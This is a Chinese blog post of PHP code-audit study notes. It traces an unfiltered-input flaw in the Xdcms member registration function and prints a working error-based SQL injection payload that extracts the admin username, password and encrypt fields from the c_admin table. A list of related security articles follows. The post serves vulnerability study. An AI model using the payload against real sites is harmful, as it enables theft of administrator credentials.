PHP代码审计 17 实战 Xdcms 漏洞挖掘 SQL 注入

最新推荐文章于 2024-08-13 14:00:00 发布
最新推荐文章于 2024-08-13 14:00:00 发布
阅读量1.9k 收藏 3
点赞数
分类专栏: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81176754
版权

本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程

PHP 代码审计博客目录

1. 简介

  1. 思路

    查看网站后台管理页面的源码,查看网站使用了那些过滤函数(通常会有一些自定义的过滤函数可供调用)
    通常情况下 G E T _GET GET、_POST 都是用了过滤函数之后才会和数据库进行连接,如果发现未使用过滤函数,那么说明存在漏洞。

  2. 在页面 xdcms\system\modules\member\index.php 中

    function register_save() 中的 G E T _GET GET、_POST 未使用过滤函数。

    另外,在 77 行中定义了错误的提示处理,但未定义错误的退出行为。

     $field_sql="update ".DB_PRE."member set {$field_sql} where userid={$last_id}";
 $query=$this->mysql->query($field_sql);

    通过查找 query() 函数,发现,仅仅是报错,说明如果存在注入操作也不会中断运行

  3. 注入 exp

      where userid=8 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x3a,encrypt,0x27,0x7e)from c_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

  4. 在注册会员页面抓包

    在这里插入图片描述在这里插入图片描述

网络安全打工人
关注
专栏目录
xdcms漏洞合集-漏洞复现_xdcms漏洞复现,头条网络安全面试
m0_61549591的博客
04-06 866
XDcms订餐网站管理系统,主要使用Php+Mysql+Smarty技术基础进行开发,采用OOP(面向对象)方式进行基础运行框架搭建,集成在线订餐、团购、积分商城、优惠券、新闻、在线订单、在线支付、生成订单短信/邮箱通知、点评、Google电子地图、问答、并与支付宝、Dz论坛、短信平台接口完美整合等功能于一体的完全开源的高级订餐网站管理系统。作为国内最受欢迎的PHP类订餐网站系统之一,XDcms在不断提升用户服务、提高产品质量的同时更加注重用户体验。
xdcms SQL注入漏洞
m0_51775169的博客
11-16 1596
xdcms SQL注入漏洞 实验目的:获取目标网站目录信息 实验工具BURP SQLMap 中国菜刀 操作机windows XP 目标网站www.test.ichunqiu 第一步获取网站管理员账号密码。 打开浏览器输入网址www.test.ichunqiu 进入注册页面 填写好注册信息别动!打开工具burpLoader.jar 回到浏览器,设置局域网本地代理,依次点击 设置 -> 更改代理服务器设置 -> 连接 -> 局域网设置,在 为 LAN 使用代理服务器 前打钩,在地址上填 127
Web 安全 PHP 代码审查之常规漏洞
最新发布
ZL_1618的博客
08-13 618
工欲善其事,必先利其器。我们做代码审计之前选好工具也是十分必要的。下面我给大家介绍两款代码审计中比较好用的工具。功能介绍RIPS 是一款基于 PHP 开发的针对 PHP 代码安全审计的软件。另外,它也是一款开源软件,由国外安全研究员 Johannes Dahse 开发,程序只有 450KB,目前能下载到的最新版是0.55。在写这段文字之前笔者特意读过它的源码,它最大的亮点在于调用了 PHP 内置解析器接口。
xdcms漏洞合集-漏洞复现
zkaqlaoniao的博客
11-09 1300
XDcms订餐网站管理系统,主要使用Php+Mysql+Smarty技术基础进行开发,采用OOP(面向对象)方式进行基础运行框架搭建,集成在线订餐、团购、积分商城、优惠券、新闻、在线订单、在线支付、生成订单短信/邮箱通知、点评、Google电子地图、问答、并与支付宝、Dz论坛、短信平台接口完美整合等功能于一体的完全开源的高级订餐网站管理系统。作为国内最受欢迎的PHP类订餐网站系统之一,XDcms在不断提升用户服务、提高产品质量的同时更加注重用户体验。
PHP漏洞挖掘
10-21
20条途径挖掘PHP漏洞,请各位看看。大概有用吧
xdcms漏洞合集-漏洞复现_xdcms漏洞复现,2024年最新写给正在求职的网络安全开发
uiuuyy67的博客
04-15 882
XDcms订餐网站管理系统,主要使用Php+Mysql+Smarty技术基础进行开发,采用OOP(面向对象)方式进行基础运行框架搭建,集成在线订餐、团购、积分商城、优惠券、新闻、在线订单、在线支付、生成订单短信/邮箱通知、点评、Google电子地图、问答、并与支付宝、Dz论坛、短信平台接口完美整合等功能于一体的完全开源的高级订餐网站管理系统。作为国内最受欢迎的PHP类订餐网站系统之一,XDcms在不断提升用户服务、提高产品质量的同时更加注重用户体验。
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5039
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
PHP代码审计实战XDcms
Mi1k7ea
10-21 4156
这里主要讲v2.0.8版本的XDcms中的一个基于错误的SQL注入漏洞,较v2.0.7版本而言修复了很多注入漏洞,使得注入漏洞大为减少。 至于CMS的下载配置等就不说了,直接审计吧~ 先整体看,点击index.php,先判断是否存在文件config.inc.php,若不存在则重定向去安装;然后就是通过require()函数包含/system/common.inc.php文件:
代码审计:KKCMS 前台sql注入漏洞复现
qq_43233085的博客
05-13 1431
代码审计:KKCMS 前台sql注入漏洞复现安装cms前台 vlist.php 注入漏洞复现 安装cms 下载地址:https://github.com/wangyifani/kkcms/ 程序开发环境: apache2.0 php5.6.40 mysql5.5 程序建议使用环境: linux系统使用nginx1.12及以上, Windows系统使用apache 1.8以上 php统一使用php5.6版本 mysql使用5.0及以上版本 后台默认密码admin和123456 前台 vlist.php
SQL注入漏洞简单挖掘-01
09-15
本课程提供了一个详细的SQL注入漏洞挖掘指南,包括环境搭建、自动化审计工具、直接挖掘select注入漏洞验证POC等等。通过学习这些内容,我们可以更好地理解SQL语言的工作原理,并且学会如何检测和exploit SQL注入...
【Java代码审计SQL注入
大河之犬的博客
12-15 1849
SQL 注入SQL Injection)是因为程序未能正确对用户的输入进行检查,将用户的输入以拼接的方式带入 SQL 语句中,导致了 SQL 注入的产生。黑客通过 SQL 注入可直接窃取数据库信息,造成信息泄露。
PHP漏洞挖掘(一):PHP基础知识讲解——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(一):PHP基础知识讲解——课程资源百度网盘下载地址,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
mysql注入 xfkxfk_XDCMS企业管理系统SQL注入#2
weixin_32419609的博客
01-28 326
### 简要描述:最新版XDCMS企业管理系统,由于过滤不严,可绕过限制,导致SQL注入### 详细说明:注入XDCMS企业管理系统的登录功能处,来看看\system\modules\member\index.php文件: 登录时会调用login_save进行登录验证,问题就出在index.php的login_save函数处:```public function login_save(){$us...
PHP漏洞挖掘(二):PHP常见漏洞分析——课程
W小哥
06-01 274
放在csdn我的资源与XXX球: 链接:https://download.csdn.net/download/weixin_40412037/18413642 目录: 1-1 课程介绍 1-2 漏洞测试环境搭建 2-1 --密码漏洞分析讲解 2-10 PHP上传漏洞讲解 2-2 XSS漏洞讲解之持久型 2-3 XSS漏洞讲解之非持久型 2-4 SQL注入漏洞之联合注入 2-5 SQL注入漏洞之布尔注入 2-6 SQL注入漏洞之延时注入 2-7 SQL注入漏洞之报错注入 2-8 SQL注入漏洞之insert注
PHP代码审计漏洞挖掘的一点思考
weixin_33726313的博客
09-19 219
PHP漏洞有很大一部分是来自于程序员本身的经验不足,当然和服务器的配置有关,但那属于系统安全范畴了,我不太懂,今天我想主要谈谈关于PHP代码审计漏洞挖掘的一些思路和理解。 PHP漏洞发掘,其实就是web的渗透测试,和客户端的fuzzing测试一样,web的渗透测试也可以使用类似的技术,web fuzzing,即基于web的动态扫描。 这类软件国内外有很多,如WVS,Lan Guard,S...
php网站漏洞挖掘,零基础学习挖掘PHP网站漏洞
weixin_42332131的博客
03-11 177
教程介绍本套课程,分为三个阶段:第一阶段:基础篇 学习PHP开发的基础知识,对PHP常见的漏洞进行分析,第二阶段:进阶篇 实战PHP漏洞靶场,了解市面上的PHP主流网站开发技术,并对市面上的主流框架进行漏洞分析,第三阶段:高级篇 实战演示PHP代码审计技术,并能手动开发PHP框架,了解大型网站的核心技术!学习地址百度:https://pan.baidu.com/s/1lI0UuO5tZFaytjY...
PHP漏洞挖掘思路+实例
weixin_33950035的博客
03-08 747
lxj616 · 2013/12/27 14:09最近研究PHP漏洞的挖掘,总结了一些我挖到的漏洞,整理了一下思路,求各路神人补充、批评、指导~本文所有示例均来自我在乌云上已由厂商允许公开的漏洞由于是实例的分析,基础知识请百度,就不全都粘贴到前面了0x01:  搜索所有的用户可控变量(GET/POST/COOKIE/referer)原因:所有用户输入都是有害的,代码审计注重函数和变量,先看看在什么...
php新手漏洞挖掘,php漏洞挖掘思路
weixin_32705179的博客
03-16 173
最近研究PHP 漏洞的挖掘,总结了一些我挖到的漏洞,整理了一下思路,求各路神人补充、批评、指导~本文所有示例均来自我在乌云上已由厂商允许公开的漏洞由于是实例的分析,基础知识请百度,就不全都粘贴到前面了0x01: 搜索所有的用户可控变量(GET/POST/COOKIE/referer )原因:所有用户输入都是有害的,代码审计注重函数和变量,先看看在什么地方会有输入可能出现的场景:a) id=$_GE...
2019代码审计实战:深入解析SQL注入与框架漏洞
- 搭建审计工具:审计工具是提高效率的关键,包括开发定制的工具来检测常见的漏洞,如SQL注入和反序列化漏洞。 3. 示例演示: - SQL注入:展示了如何利用动态输入可能导致恶意SQL查询,如原始查询被修改为`select...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值